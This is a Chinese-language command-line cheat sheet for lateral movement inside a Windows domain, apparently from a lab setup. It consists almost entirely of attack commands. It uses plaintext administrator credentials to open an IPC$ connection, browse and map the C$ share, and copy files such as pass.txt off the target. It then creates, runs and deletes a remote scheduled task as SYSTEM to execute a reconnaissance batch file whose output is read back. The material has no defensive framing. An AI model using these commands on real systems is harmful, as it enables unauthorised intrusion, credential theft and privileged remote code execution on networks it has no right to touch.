内网渗透之命令行渗透

命令：net use \\192.168.3.21 /u:god\administrator Admin12345

net view \\192.168.3.21

NETLOGON      Disk          Logon server shareSYSVOL        Disk          Logon server share

net use \\192.168.3.21 /del /y

# 查看C盘下的文件dir \\192.168.3.21\c$

# 把当前机器C盘下的1.txt文件拷贝到目标桌面copy 1.txt \\192.168.3.21\c$\users\administrator\desktop\

# 吧目标机器上的pass.txt拷贝到本地coyp \\192.168.3.21\c$\users\administrator\desktop\pass.txt

# 查看目标桌面1.txt文件内容type \\192.168.3.21\c$\users\administrator\desktop\1.txt

# 把目标C盘映射到本地的x盘，x盘可以随便取名net use x: \\192.168.3.21\c$

# 一、执行batschtasks /create /tn task1 /U 域\域用户 /P 域用户密码 /tr 执行的命令或者bat路径 /sc ONSTART /s 域机器IP /RU system# 二、运行schtasks /run /tn task1 /s 域机子IP /U 域\域用户 /P 域用户密码# 三、删除计划任务schtasks /F /delete /tn task1 /s 域机子IP /U 域\域用户 /P 域用户密码
/RU system  ：立即执行，以system权限执行

# 域用户schtasks /create /tn task1 /U domain\username /P password /tr C:\temp\1.bat /sc /ONSTART /s 192.168.1.1 /RU systemschtasks /run /tn task1 /s 192.168.1.1 /U domain\username /P passwordschtasks /F /delete /tn task1 /s 192.168.1.1 /U domain\username /P password
# 本地用户schtasks /create /tn task1 /U a\username /P password /tr C:\temp\1.bat /sc ONSTART /s 192.168.1.1 /RU systemschtasks /run /tn task1 /s 192.168.1.1 /U a\username /P passwordschtasks /F /delete /tn task1 /s 192.168.1.1 /U a\username /P password

whoami >> c:\windows\temp\1.txtnet user >> c:\windows\temp\1.txtsysteminfo >> c:\windows\temp\1.txt

copy 1.bat \\192.168.3.21\c$\users\administrator\desktop

# 创建计划任务名为task1schtasks /create /tn task1 /U god\administrator /P Admin12345 /tr C:\users\administrator\desktop\1.bat /sc ONSTART /s 192.168.3.21 /RU system# 执行计划任务task1schtasks /run /tn task1 /s 192.168.3.21 /U god\administrator /P Admin12345# 删除计划任务task1schtasks /F /delete /tn task1 /s 192.168.3.21 /U god\administrator /P Admin12345

type \\192.168.3.21\c$\windows\temp\1.txt